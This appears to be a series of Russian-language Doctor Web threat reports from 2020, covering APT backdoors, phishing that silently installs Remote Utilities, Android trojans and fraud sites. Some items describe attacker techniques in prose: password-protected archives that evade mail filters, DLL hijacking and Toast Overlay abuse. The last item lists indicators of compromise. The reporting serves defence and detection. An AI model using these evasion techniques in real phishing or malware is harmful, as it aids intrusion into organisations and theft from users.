Летом вирусная лаборатория «Доктор Веб» выпустила масштабное исследование вредоносного ПО, применявшегося в APT-атаках на государственные учреждения Казахстана и Киргизии. В рамках расследования аналитики обнаружили ранее неизвестное семейство мультимодульных троянских программ XPath, предназначенных для несанкционированного доступа к компьютерам с последующим выполнением различных вредоносных действий по команде злоумышленников. Представители семейства использовали сложный механизм заражения, при котором работа каждого модуля соответствовала определенной стадии работы вредоносной программы. Кроме того, трояны обладали руткитом для сокрытия сетевой активности и следов присутствия в скомпрометированной системе.
Позже в вирусную лабораторию «Доктор Веб» поступили новые образцы ВПО, обнаруженные на одном из зараженных компьютеров локальной сети госучреждения Киргизии. Самой интересной находкой оказался многокомпонентный троян-бэкдор ShadowPad, который, по нашим данным, может являться эволюцией другого мультимодульного APT-бэкдора — PlugX, ранее также обнаруженного в скомпрометированных сетях пострадавших организаций. Сходствам в коде образцов ShadowPad и PlugX, а также некоторым пересечениям в их сетевой инфраструктуре было посвящено отдельное исследование.
В сентябре компания «Доктор Веб» сообщила о выявлении спам-кампании с элементами социнженерии, нацеленной на ряд предприятий топливно-энергетического комплекса России. Для первичного заражения злоумышленники использовали электронные письма с вредоносными вложениями, при открытии которых устанавливались бэкдоры, позволяющие управлять инфицированными компьютерами. Анализ документов, вредоносных программ, а также использованной инфраструктуры свидетельствует о возможной причастности к этой атаке одной из китайских APT-групп.
В ноябре вирусные аналитики «Доктор Веб» зафиксировали рассылку фишинговых писем корпоративным пользователям. В качестве вредоносной нагрузки письма содержали троянские программы, обеспечивающие скрытую установку и запуск утилиты Remote Utilities, установочные компоненты которой также находились в составе вложения. Чтобы заставить потенциальных жертв открыть вложения, злоумышленники применяли методы социальной инженерии.
Анализ данных статистики Dr.Web показал, что в 2020 году пользователей чаще всего атаковали трояны-дропперы и загрузчики, которые устанавливали другие вредоносные приложения и выполняли произвольный код. Кроме того, пользователям по-прежнему угрожали трояны и скрипты, выполняющие скрытый майнинг криптовалют.
В почтовом трафике преобладали трояны-банкеры, бэкдоры и вредоносное ПО, использующее уязвимости офисных документов. Кроме того, злоумышленники распространяли скрипты для скрытого майнинга и фишинга, а также перенаправления пользователей на нежелательные и потенциально опасные сайты.
По сравнению с 2019 годом, в 2020 году число запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков, в антивирусную лабораторию «Доктор Веб» поступило на 18,4% меньше. Динамика регистрации таких запросов в 2020 году показана на графике:
Базы Родительского (Офисного) контроля и веб-антивируса SpIDer Gate в продуктах Dr.Web регулярно пополняются новыми адресами нерекомендуемых и потенциально опасных сайтов. Среди них — мошеннические и фишинговые ресурсы, а также страницы, с которых распространяется вредоносное ПО. Наибольшее число таких ресурсов было зафиксировано в третьем квартале, а наименьшее — во втором. Динамика пополнения баз нерекомендуемых и опасных сайтов в уходящем году показана на диаграмме ниже.
В феврале специалисты компании «Доктор Веб» предупредили пользователей о запуске в социальной сети Instagram масштабной фишинговой кампании, основанной на сообщениях о единовременной выплате всем гражданам Российской Федерации. Злоумышленники подавали информацию в виде отрывков из выпусков новостей, используя подходящие по смыслу фрагменты из настоящих эфиров. При этом в видеоряд были вставлены дополнительные кадры, содержащие инструкции по заполнению форм на фишинговых сайтах, которые маскировались под официальные ресурсы Минэкономразвития России.
В течение 2020 года интернет-аналитиками компании было выявлено множество мошеннических сайтов, маскирующихся под официальные ресурсы государственных организаций. Чаще всего мошенники предлагали получить несуществующую компенсацию или инвестировать в крупные компании.
Для получения обещанных выгод посетителям чаще всего требовалось ввести свои данные, включая данные банковских карт, и предварительно внести оплату. Таким образом, пользователи теряли не только деньги, но и передавали свои персональные данные злоумышленникам.
В 2020 году владельцам Android-устройств угрожали различные вредоносные и нежелательные приложения. Например, пользователи часто сталкивались со всевозможными рекламными троянами, которые показывали надоедливые уведомления и баннеры. Среди них было множество вредоносных программ семейства Android.HiddenAds, распространявшихся в том числе через каталог Google Play. В течение года вирусные аналитики «Доктор Веб» выявили в нем десятки этих троянов, которых загрузили более 3 300 000 пользователей. На долю таких вредоносных приложений пришлось свыше 13% от общего числа угроз, выявленных на Android-устройствах.
Кроме того, в марте вирусные аналитики обнаружили в Google Play многофункционального трояна Android.Circle.1, которой получал команды с BeanShell-скриптами и также мог показывать рекламу. Помимо этого, он мог переходить по ссылкам, загружать веб-сайты и нажимать на размещенные там баннеры. Позднее были найдены и другие вредоносные программы, принадлежащие к этому семейству.
Другой угрозой, с которой часто сталкивались пользователи, стали всевозможные трояны-загрузчики. Среди них были многочисленные представители семейства Android.RemoteCode, скачивающие и выполняющие произвольный код. На их долю пришлось более 14% угроз, выявленных антивирусными продуктами Dr.Web для Android. Кроме того, владельцам Android-устройств угрожали трояны семейств Android.DownLoader и Android.Triada, загружавшие и устанавливавшие другие приложения.
Наряду с троянами-загрузчиками широкое распространение получили потенциально опасные утилиты, позволяющие запускать программы без их установки. Среди них — утилиты Tool.SilentInstaller и Tool.VirtualApk. Вирусописатели активно применяли их для распространения различного ПО, получая вознаграждение от партнерских сервисов.
Для распространения вредоносных и нежелательных приложений злоумышленники активно эксплуатировали тему пандемии коронавируса. Например, они создавали различные мошеннические сайты, на которых жертвам предлагалось установить справочные или медицинские программы, связанные с коронавирусной инфекцией, а также приложения для получения материальной помощи. В действительности с таких сайтов на Android-устройства загружались шпионские программы, различные банковские трояны, трояны-вымогатели и другое вредоносное ПО.
В течение года вирусные аналитики «Доктор Веб» выявили в каталоге Google Play множество вредоносных приложений семейства Android.FakeApp, предназначенных для загрузки мошеннических сайтов. Злоумышленники выдавали этих троянов за справочники с информацией о социальных выплатах и компенсациях. В период пандемии и непростой экономической ситуации пользователей интересовали такие сведения, и на уловку киберпреступников попалось множество владельцев Android-устройств.
Также в 2020 году на Android-устройствах было выявлено множество приложений, позволяющих следить за их владельцами. Они могли применяться для кибершпионажа и собирать широкий спектр персональной информации — переписку, фотографии, документы, список контактов, информацию о местоположении, сведения о контактах, телефонных разговорах и т. д.
Прошедший год продемонстрировал устойчивое распространение не только массового вредоносного ПО, но и APT-угроз, с которыми сталкивались организации по всему миру.
В 2021 году следует ожидать дальнейшего распространения цифрового вымогательства, при этом целевым атакам с использованием троянов-шифровальщиков все чаще будут подвержены частные компании и корпоративный сектор. Этому способствует развитие модели RaaS (Ransomware as a Service — вымогательство как услуга), а также ощутимый для хакерских группировок результат, стимулирующий их преступную деятельность. Возможное сокращение расходов на информационную безопасность также может привести к стремительному росту числа подобных инцидентов.
Пользователям по-прежнему будет угрожать массовое вредоносное программное обеспечение —банковские и рекламные трояны, майнеры и шифровальщики, а также шпионское ПО. Стоит также готовиться к появлению новых мошеннических схем и фишинговых кампаний, с помощью которых злоумышленники будут пытаться завладеть не только деньгами, но и персональными данными.
Владельцы устройств под управлением macOS, Android, Linux и других операционных систем останутся под пристальным вниманием вирусописателей, и вредоносное ПО продолжит свое распространение на эти платформы. Также можно ожидать, что участятся и станут более изощренными атаки на устройства интернета вещей. Можно с уверенностью сказать, что киберпреступники продолжат использовать для своего обогащения любые методы, поэтому пользователям необходимо соблюдать правила информационной безопасности и применять надежные антивирусные средства на всех устройствах.
|
|
«Доктор Веб»: обзор вирусной активности в декабре 2020 года |
28 декабря 2020 года
В декабре анализ данных статистики Dr.Web показал уменьшение общего числа обнаруженных угроз на 11.49% по сравнению с ноябрем. Количество уникальных угроз также снизилось — на 24.51%. По общему количеству детектирований лидируют рекламные программы и вредоносные расширения для браузеров. В почтовом трафике на первых позициях находится разнообразное вредоносное ПО, в том числе банковский троян Trojan.SpyBot.699, обфусцированный стилер, написанный на VB.NET, а также программы, использующие уязвимости документов Microsoft Office.
Число обращений пользователей за расшифровкой файлов снизилось на 31.54% по сравнению с ноябрем. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого приходится 37.14% всех инцидентов.
Угрозы прошедшего месяца:
Запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков, в декабре в антивирусную лабораторию «Доктор Веб» поступило на 28.41% меньше, чем в ноябре.
В течение декабря 2020 года в базу нерекомендуемых и вредоносных сайтов было добавлено 105 840 интернет-адресов.
| Ноябрь 2020 | Декабрь 2020 | Динамика |
|---|---|---|
| + 154 606 | + 105 840 | - 31.54% |
Согласно статистике детектирований, полученной антивирусными продуктами Dr.Web для Android, в декабре на защищаемых Android-устройствах было выявлено на 25,34% меньше угроз по сравнению с ноябрем. При этом наиболее часто пользователи сталкивались с рекламными троянами, а также вредоносными приложениями, загружающими другое ПО и выполняющими произвольный код.
Очередная угроза была обнаружена в каталоге Google Play. Это оказался троян Android.Joker.477, который скрывался в приложении с коллекцией изображений. Он подписывал жертв на дорогостоящие мобильные сервисы и мог загружать и выполнять произвольный код.
Кроме того, в декабре пользователей Android-устройств атаковали различные банковские трояны.
Наиболее заметные события, связанные с «мобильной» безопасностью в декабре:
Более подробно о вирусной обстановке для мобильных устройств в декабре читайте в нашем обзоре.
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в декабре 2020 года |
28 декабря 2020 года
По сравнению с ноябрем в декабре антивирусные продукты Dr.Web для Android выявили на защищаемых устройствах на 25,34% меньше угроз. Согласно полученной статистике, количество обнаруженных вредоносных программ сократилось на 25,35%, нежелательных - на 21%, потенциально опасных - на 68,1%, а рекламных - на 25,01%. Чаще всего пользователи Android-устройств сталкивались с рекламными троянами, вредоносными приложениями, способными выполнять произвольный код, а также различными троянами-загрузчиками.
В середине месяца вирусные аналитики копании «Доктор Веб» обнаружили в каталоге Google Play многофункционального трояна Android.Joker.477, который распространялся под видом программы с коллекцией изображений. Кроме того, были зафиксированы очередные атаки с использованием банковских троянов, в частности - Android.BankBot.684.origin и Android.BankBot.687.origin. В ряде случаев злоумышленники выдавали их за программы, позволяющие получить финансовую помощь от государства в период пандемии.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
В декабре вирусные аналитики компании «Доктор Веб» выявили в каталоге Google Play очередного трояна. Это был представитель семейства Android.Joker, получивший имя Android.Joker.477. Троян распространялся под видом сборника изображений, но в действительности предназначался для подписки пользователей на платные услуги, а также загрузки и выполнения произвольного кода.
Среди троянских программ, угрожавших пользователям в прошедшем месяце, были банкеры Android.BankBot.684.origin и Android.BankBot.687.origin. Новые модификации этих вредоносных приложений, обнаруженные нашими специалистами, атаковали жителей Турции. Трояны распространялись через мошеннические сайты, на которых потенциальным жертвам предлагалось получить материальную помощь от государства в связи с пандемией. Для этого пользователи должны были загрузить и установить специализиронванное ПО, которое на самом деле являлось вредоносным.
Попадая на Android-устройства, банкеры запрашивали доступ к специальным возможностям (Accessibility Service) ОС Android для расширения своих полномочий, скрывали свои значки из списка установленных приложений на главном экране и приступали к выполнению основных функций. Они похищали конфиденциальную информацию, демонстрируя фишинговые окна поверх окон других приложений, перехватывали СМС, могли блокировать экран, а также выполняли другие вредоносные действия.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в ноябре 2020 года |
16 декабря 2020 года
В ноябре антивирусные продукты Dr.Web для Android выявили на защищаемых устройствах на 5,14% меньше угроз по сравнению с октябрем. Согласно статистике детектирований, число обнаруженных вредоносных программ снизилось на 8,37%. В то же время число нежелательных, потенциально опасных и рекламных программ, наоборот, увеличилось на 5,78%, 13,16% и 5,72% соответственно.
Среди угроз, выявленных в каталоге Google Play вирусными аналитиками «Доктор Веб», оказался троян Android.Mixi.44.origin. Он загружал и показывал сайты поверх окон других приложений, незаметно переходил по ссылкам и позволял злоумышленникам зарабатывать на том, что пользователи устанавливали то или иное ПО.
Кроме того, наши специалисты обнаружили несколько новых представителей семейства троянов Android.Joker. Их основные функции - загрузка и выполнение произвольного кода, перехват содержимого поступающих уведомлений и подписка на платные сервисы без согласия владельцев Android-устройств.
В середине ноября вирусные аналитики компании «Доктор Веб» выявили в Google Play трояна Android.Mixi.44.origin, который был встроен в приложение для заботы о зрении пользователей Android-устройств. Оно действительно выполняло заявленную функцию, но также имело и скрытые возможности.
Так, Android.Mixi.44.origin загружал веб-сайты и демонстрировал их поверх окон других приложений и интерфейса операционной системы, мешая нормальной работе с устройством. Содержимое этих сайтов могло быть любым: от рекламных баннеров и видеороликов до фишинговых страниц.
Другой функцией трояна был незаметный переход по ссылкам. Android.Mixi.44.origin получал от злоумышленников список веб-адресов, которые ему необходимо было посетить. Таким образом вредоносная программа искусственно увеличивала популярность сайтов, за что ее авторы получали вознаграждение.
Кроме того, троян пытался заработать на недавно выполненных установках программ. Для этого он отслеживал, какие приложения устанавливает и удаляет пользователь. Если получаемые в командах ссылки вели на страницы приложений в Google Play, Android.Mixi.44.origin проверял, были ли эти приложения уже установлены ранее. Если да, троян передавал в сервис аналитики информацию об именах пакетов этих программ вместе с реферал-идентификатором злоумышленников. Тем самым он пытался присвоить установки мошенникам, к которым те не имели никакого отношения.
Если же такие программы еще не устанавливались, троян запоминал их и ожидал момента, когда пользователь их установит, после чего аналогичным образом пытался обмануть сервис.
Подробнее об Android.Mixi.44.origin рассказано в соответствующем новостном материале на сайте компании «Доктор Веб».
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
Наряду с Android.Mixi.44.origin в течение последнего осеннего месяца вирусные аналитики компании «Доктор Веб» обнаружили в каталоге Google Play несколько новых модификаций троянов семейства Android.Joker. Они были добавлены в вирусную базу Dr.Web как Android.Joker.418, Android.Joker.419 и Android.Joker.452. Эти трояны распространялись под видом безобидных приложений - программы-переводчика, сборника изображений, а также утилиты с большим набором функций, таких как компас, фонарик, уровень и др.
Вредоносные приложения загружали и выполняли произвольный код, а также могли подписывать пользователей на платные мобильные сервисы, перехватывая из поступающих уведомлений коды подтверждения для подключаемых услуг.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
|
|
«Доктор Веб»: обзор вирусной активности в ноябре 2020 года |
16 декабря 2020 года
В ноябре анализ данных статистики Dr.Web показал незначительное уменьшение общего числа обнаруженных угроз — на 1.75% по сравнению с октябрем. Количество уникальных угроз при этом увеличилось на 5.26%. Чаще всего пользователей атаковали программы для показа рекламы, а также троянские загрузчики и установщики. В почтовом трафике на первых позициях находится разнообразное вредоносное ПО, в том числе бэкдор, написанный на .NET, банковский троян Trojan.SpyBot.699, а также программы, использующие уязвимости документов Microsoft Office.
Число обращений пользователей за расшифровкой файлов снизилось на 3.08% по сравнению с октябрем. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого приходится 36.68% всех инцидентов.
В ноябре вирусные аналитики компании «Доктор Веб» зафиксировали рассылку фишинговых писем корпоративным пользователям. Злоумышленники использовали метод социальной инженерии, чтобы заставить потенциальных жертв открыть вредоносные вложения. Письма содержали троянские программы, обеспечивающие скрытую установку и запуск утилиты Remote Utilities, компоненты которой также находились в составе вложения. В случае заражения компьютеры сотрудников оказывались доступны для удаленного управления без каких-либо визуальных признаков работы программы.
Угрозы прошедшего месяца:
По сравнению с прошлым месяцем, в ноябре запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков, в антивирусную лабораторию «Доктор Веб» поступило на 3.08% меньше.
В течение ноября 2020 года в базу нерекомендуемых и вредоносных сайтов было добавлено 154 606 интернет-адресов.
| Октябрь 2020 | Ноябрь 2020 | Динамика |
|---|---|---|
| + 157 076 | + 154 606 | - 1.57% |
Согласно статистике детектирований, полученной антивирусными продуктами Dr.Web для Android, в ноябре на защищаемых устройствах было выявлено на 5.14% меньше угроз по сравнению с октябрем.
В каталоге Google Play по-прежнему появляются различные вредоносные приложения. Так, в прошедшем месяце вирусные аналитики «Доктор Веб» обнаружили в нем очередных троянов. Среди них были представители семейства Android.Joker, способные выполнять произвольный код и подписывать пользователей на дорогостоящие мобильные услуги, а также многофункциональный троян Android.Mixi.44.origin.
Наиболее заметные события, связанные с «мобильной» безопасностью в ноябре:
Более подробно о вирусной обстановке для мобильных устройств в ноябре читайте в нашем обзоре.
|
|
Фишинговые рассылки RAT-троянов угрожают корпоративным пользователям |
11 декабря 2020 года
Обнаруженные нами образцы можно разделить на 2 группы:
Обе группы вредоносного ПО объединяет не только используемый инструмент — Remote Utilities, — но и формат фишинговых писем. Их можно охарактеризовать как достаточно грамотно составленные и относительно объемные сообщения на русском языке, использующие потенциально интересную для получателя тему. Другой особенностью является защита вредоносной нагрузки при помощи пароля, при этом сам пароль приложен в виде текстового файла. Формат пароля представляет собой дату отправки письма.
Пример письма с вредоносным вложением, использующим DLL Hijacking:
В приложенном архиве находится защищенный RAR-архив и текстовый файл с паролем к нему.
Для обеспечения конфиденциальности вложения установлен автоматический пароль: 02112020
Архив «Электронная повестка.rar» содержит дроппер в виде самораспаковывающегося RAR-архива, в котором, в свою очередь, находится BackDoor.RMS.180.
Ниже приведен пример письма с вложением, использующим MSI-пакет.
Архив «Документы.rar» помимо архива с вредоносной нагрузкой (BackDoor.RMS.181) и файла с паролем содержит документы-пустышки.
В связи с корпоративной политикой безопасности данное вложение защищено кодом доступа: 12112020
В ходе исследования мы также обнаружили образец фишингового письма, содержащего ссылку на дроппер, запускающий установку утилиты Remote Utilities из настроенного MSI-пакета (детектируется Dr.Web как BackDoor.RMS.187). В этом письме отличается формат вредоносного модуля и способ его получения.
Вложение «CV_resume.rar» представляет собой ссылку на взломанный сайт, перенаправляющий пользователя на другой ресурс для загрузки вредоносного архива с BackDoor.RMS.187.
В результате анализа сетевой инфраструктуры, используемой злоумышленниками для распространения BackDoor.RMS.187, мы обнаружили еще несколько скомпрометированных сайтов, а также образец трояна Trojan.Gidra. По нашим данным, программа, детектируемая Dr.Web как Trojan.GidraNET.1, использовалась для первичного проникновения в систему через фишинговое письмо и дальнейшей загрузки бэкдора, скрыто устанавливающего утилиту Remote Utilties.
Подробные технические описания обнаруженных вредоносных программ находятся в вирусной библиотеке Dr.Web.
BackDoor.RMS.180
BackDoor.RMS.181
BackDoor.RMS.187
Trojan.GidraNET.1
Бэкдоры на базе утилит для удаленного администрирования остаются актуальной угрозой безопасности и до сих пор применяются для атак на корпоративный сектор. В свою очередь фишинговые письма являются основным средством доставки полезной нагрузки на заражаемые компьютеры. Отличительная черта вредоносных вложений — архивация полезной нагрузки с использованием пароля, что позволяет письму преодолеть встроенные в почтовый сервер средства защиты. Другой особенностью является наличие текстового файла с паролем к поддельному архиву. Кроме того, использование вредоносной библиотеки и атаки DLL Hijacking обеспечивает скрытое функционирование ПО для удаленного управления на скомпрометированном устройстве.
|
|
В приложении для заботы о зрении пользователей Android-устройств обнаружен троян |
1 декабря 2020 года
Приложение под названием Eye Care - Your close Eye Care Assistant доступно в каталоге Google Play с 2018 года, но троянская функциональность появилась в нем лишь в 2019 году, начиная с версии 1.2.11. Вредоносные версии программы были добавлены в вирусную базу Dr.Web как Android.Mixi.44.origin.
Внешне это приложение выглядит безобидно и работает в соответствии с ожиданиями пользователя. Однако после запуска оно незаметно приступает к выполнению вредоносных действий.
Android.Mixi.44.origin собирает и передает на C&C-сервер следующую информацию о зараженном устройстве:
Одной из его функций является мошенническая монетизация недавно выполненных установок приложений. Для этого Android.Mixi.44.origin постоянно отслеживает факт установки и удаления программ, сохраняя информацию о каждом таком действии.
Подключаясь к C&C-серверу, троян получает от него ссылку на сайт, с которого передается список веб-адресов для посещения. С интервалом в несколько секунд он незаметно загружает каждый из них в невидимом WebView. Если полученная в результате цепочки перенаправлений ссылка ведет на страницу приложения, размещенного в каталоге Google Play, но еще не установленного на устройство, троян запоминает имя пакета этого приложения и время перехода по ссылке. Далее он просто ожидает момента, когда пользователь выполнит установку нужной программы. Если в дальнейшем Android.Mixi.44.origin обнаруживает установку такого приложения, он передает в сервис рекламной аналитики, отслеживающий успешно выполненные рекламные задания, имя пакета, а также реферал-идентификатор (идентификатор участника партнерской программы). Таким образом троян пытается обмануть этот сервис и присвоить злоумышленникам установку приложения, которую пользователь выполнил самостоятельно и без их участия.
Если же полученная в задании ссылка на страницу в Google Play ведет на приложение, которое уже было установлено ранее, и информация о нем известна трояну, Android.Mixi.44.origin аналогичным образом пытается обмануть сервис аналитики, передав ему имя пакета вместе с реферал-идентификатором злоумышленников.
Другая функция Android.Mixi.44.origin - работа в режиме кликера, когда получаемые трояном ссылки ведут на всевозможные сайты. Посещая их незаметно для пользователя, он увеличивает их популярность, за что партнерские сервисы также платят злоумышленникам.
Кроме того, по команде C&C-сервера троян способен загружать различные веб-страницы и демонстрировать их поверх окон других приложений, а также поверх интерфейса самой операционной системы. Для этого он эксплуатирует уязвимость Toast Overlay, известную на протяжении нескольких лет. Ей подвержены устройства под управлением ОС Android вплоть до версии 7.1. Троян создает всплывающее уведомление типа Toast, которое перекрывает все остальные графические элементы. В это уведомление он помещает WebView с загруженной в него целевой веб-страницей. При этом содержимое такой страницы может быть любым: рекламный баннер, видеоролик или даже фишинговый сайт.
Таким образом, основными функциями Android.Mixi.44.origin являются показ рекламы, накрутка счетчиков популярности веб-сайтов, а также его потенциальное применение в фишинг-атаках. Вместе с тем этот троян принадлежит к семейству многофункциональных вредоносных приложений, предназначенных для выполнения широкого спектра задач. Отдельные представители этого семейства способны получать root-полномочия, незаметно устанавливать и удалять другие программы и выполнять другие опасные действия. При этом некоторые из этих троянов обнаруживались в том числе в системных каталогах Android-устройств. Один из них - Android.Mixi.36.origin. Он использует потенциально опасную утилиту Tool.SilentInstaller.7.origin для скрытого запуска загружаемых приложений. А среди скачиваемых им программ может быть Android.Mixi.42.origin - одна из модификаций рассмотренного трояна Android.Mixi.44.origin. Она обладает всеми ее функциями, но уже способна самостоятельно скачивать и незаметно запускать ПО.
Антивирусные продукты Dr.Web для Android успешно детектируют все известные модификации Android.Mixi.44.origin, а также других троянов этого семейства, поэтому для наших пользователей те опасности не представляют. Для удаления вредоносных Android-приложений из системных директорий необходимо комплексное решение Dr.Web Security Space для Android, а также наличие root-доступа. Проверить, подвержено ли ваше устройство уязвимости Toast Overlay, можно также с помощью Dr.Web Security Space для Android.
Подробнее об Android.Mixi.44.origin
Подробнее об уязвимости Toast Overlay
|
|
«Доктор Веб»: обзор вирусной активности в октябре 2020 года |
9 ноября 2020 года
В октябре анализ данных статистики Dr.Web показал значительное увеличение общего числа обнаруженных угроз — на 37.80% по сравнению с сентябрем. Количество уникальных вредоносных программ при этом снизилось на 2.64%. Рекламные программы и загрузчики вредоносного ПО по-прежнему лидируют по общему количеству детектирований. В почтовом трафике на первых позициях продолжает находиться банковский троян Trojan.SpyBot.699, а также вредоносное ПО, использующее уязвимости документов Microsoft Office. Кроме того, пользователям продолжают угрожать различные модификации вредоносных HTML-документов, распространяемых в виде вложений и перенаправляющих на фишинговые сайты.
Число обращений пользователей за расшифровкой файлов продолжает держаться на одном уровне четвертый месяц. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого приходится 26.34% всех инцидентов.
Угрозы прошедшего месяца:
По сравнению с прошлым месяцем в октябре в антивирусную лабораторию «Доктор Веб» поступило на 1.67% меньше запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков.
В течение октября 2020 года в базу нерекомендуемых и вредоносных сайтов было добавлено 157 076 интернет-адресов.
| Сентябрь 2020 | Октябрь 2020 | Динамика |
|---|---|---|
| + 152 270 | + 157 076 | + 3.16% |
Статистика детектирований угроз на Android-устройствах показала, что в минувшем октябре было выявлено на 12.36% больше угроз, чем в сентябре. При этом почти в 3 раза возросло число обнаружений потенциально опасных программ. Этот скачок произошел за счет распространения приложений, защищенных специализированным программным обфускатором, который злоумышленники могут использовать при создании троянов, усложняя их обнаружение антивирусами.
В течение октября наши специалисты выявили в каталоге Google Play множество новых вредоносных программ. Среди них были очередные трояны семейства Android.FakeApp, которые загружали мошеннические веб-сайты, а также рекламный троян, получивший имя Android.HiddenAds.2314.
Наиболее заметные события, связанные с «мобильной» безопасностью в октябре:
Более подробно о вирусной обстановке для мобильных устройств в октябре читайте в нашем обзоре.
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в октябре 2020 года |
09 ноября 2020 года
В октябре антивирусные продукты Dr.Web для Android выявили на защищаемых Android-устройствах на 12.36% больше угроз, чем месяцем ранее. Согласно статистике детектирований, число вредоносных программ увеличилось на 9.08%, нежелательных - на 6%, а потенциально опасных - на 197.24%. Количество обнаруженных рекламных приложений при этом снизилось на 1.51%.
Практически троекратный рост числа потенциально опасных программ в статистике обнаружений обусловлен распространением приложений, защищенных специализированной утилитой Tool.Obfuscapk.1. Она применяется для обфускации исходного кода и может использоваться не только добросовестными разработчиками, но и вирусописателями, которые пытаются защитить троянские программы от обнаружения антивирусами.
В каталоге Google Play были зафиксированы очередные угрозы. Специалисты «Доктор Веб» обнаружили множество новых троянов семейства Android.FakeApp, которые распространялись под видом программ-справочников, якобы предназначенных для помощи в получении налоговых вычетов и социальных компенсаций. На самом деле они загружали мошеннические веб-сайты, с помощью которых злоумышленники могли украсть у пользователей конфиденциальную информацию и деньги.
Другая вредоносная программа из Google Play получила имя Android.HiddenAds.2314. Это троян, предназначенный для показа навязчивой рекламы. Он распространялся под видом графического редактора.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
В октябре специалисты «Доктор Веб» выявили в каталоге Google Play 17 новых модификаций троянов семейства Android.FakeApp, которые распространялись под видом безобидных приложений, таких как справочники. Большинство из них злоумышленники вновь выдавали за программы, якобы предназначенные для проверки наличия социальных компенсаций и помощи в получении возврата налогов. По классификации антивируса Dr.Web они получили имена Android.FakeApp.208, Android.FakeApp.209, Android.FakeApp.210, Android.FakeApp.212, Android.FakeApp.213, Android.FakeApp.214, Android.FakeApp.215 и Android.FakeApp.216.
Еще одна модификация представляла собой поддельную программу спортивной тематики и была добавлена в вирусную базу как Android.FakeApp.211.
Однако настоящая и единственная их функция - загрузка мошеннических веб-сайтов. В общей сложности эти трояны скачали свыше 105 000 владельцев Android-устройств.
При запуске вредоносные приложения загружают сайты, где потенциальной жертве предлагается указать персональные данные якобы для проверки доступных денежных компенсаций. После того как компенсация «найдена», у пользователя запрашивается дополнительная информация, а затем ему предлагается оплатить налог или пошлину за перевод «возвращаемых» денег. Если владелец устройства соглашается на это, злоумышленники узнают не только его конфиденциальные данные (например, имя, фамилия, номер телефона и адрес электронной почты), но и реквизиты банковской карты с секретным CVV2-кодом. При этом жертва мошенничества не получает никаких обещанных компенсаций.
Другой выявленный троян принадлежал семейству вредоносных приложений Android.HiddenAds и был добавлен в вирусную базу Dr.Web как Android.HiddenAds.2314. Он распространялся под видом программы для редактирования изображений. При запуске троян скрывает свой значок из списка ПО в меню главного экрана, чтобы в дальнейшем его было сложнее обнаружить и удалить с устройства. Затем он начинает показывать рекламу, которая демонстрируется поверх окон других приложений и интерфейса операционной системы, мешая нормальному использованию устройства.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
|
|
Исследование APT-бэкдора ShadowPad и его связи с PlugX |
27 октября 2020 года
В июле 2020 года мы выпустили исследование APT-атак на государственные учреждения Казахстана и Киргизии с подробным разбором вредоносных программ, найденных в скомпрометированных сетях. В процессе расследования вирусные аналитики «Доктор Веб» проанализировали и описали несколько групп троянских программ, включая представителей как уже встречавшихся специалистам семейств, так и ранее неизвестные трояны, из которых самым главным открытием оказались образцы семейства XPath. Нам также удалось обнаружить ряд признаков, позволивших связать два изначально независимых инцидента. В обоих случаях злоумышленники использовали похожие наборы вредоносного ПО, в том числе одни и те же узкоспециализированные бэкдоры, которыми были инфицированы контроллеры домена в атакованных организациях.
В ходе экспертизы аналитики изучили образцы мультимодульных бэкдоров PlugX, которые применялись для первичного проникновения в сетевую инфраструктуру. Анализ показал, что некоторые модификации PlugX использовали те же доменные имена управляющих серверов, что и другие изученные нами бэкдоры, связанные с целевыми атаками на учреждения государств Центральной Азии. При этом обнаружение программ семейства PlugX свидетельствует о возможной причастности к рассматриваемым инцидентам китайских APT-групп.
По нашим данным, несанкционированное присутствие в обеих сетях продолжалось более трех лет, а за атаками могли стоять сразу несколько хакерских группировок. Расследования столь комплексных киберинцидентов предполагают продолжительную работу, поэтому их редко удается осветить одной публикацией.
В вирусную лабораторию «Доктор Веб» поступили новые образцы ВПО, обнаруженные на одном из зараженных компьютеров локальной сети госучреждения Киргизии.
В дополнение к описанным в предыдущем материале вредоносным программам особого внимания заслуживает бэкдор ShadowPad. Различные модификации этого семейства являются известным инструментом Winnti — APT-группы предположительно китайского происхождения, активной как минимум с 2012 года. Примечательно, что на компьютере вместе с ShadowPad был также установлен бэкдор Farfli, при этом обе программы обращались к одному управляющему серверу. Кроме того, на этом же компьютере мы обнаружили несколько модификаций PlugX.
В этом исследовании мы разобрали алгоритмы работы обнаруженных бэкдоров. Особое внимание уделено сходствам в коде образцов ShadowPad и PlugX, а также некоторым пересечениям в их сетевой инфраструктуре.
На зараженном компьютере были найдены следующие бэкдоры:
| SHA256-хеши | Детектирование | Управляющий сервер | Дата установки |
|---|---|---|---|
| ac6938e03f2a076152ee4ce23a39a0bfcd676e4f0b031574d442b6e2df532646 | BackDoor.ShadowPad.1 | www[.]pneword[.]net | 07.09.2018 13:14:57.664 |
| 9135cdfd09a08435d344cf4470335e6d5577e250c2f00017aa3ab7a9be3756b3 2c4bab3df593ba1d36894e3d911de51d76972b6504d94be22d659cff1325822e |
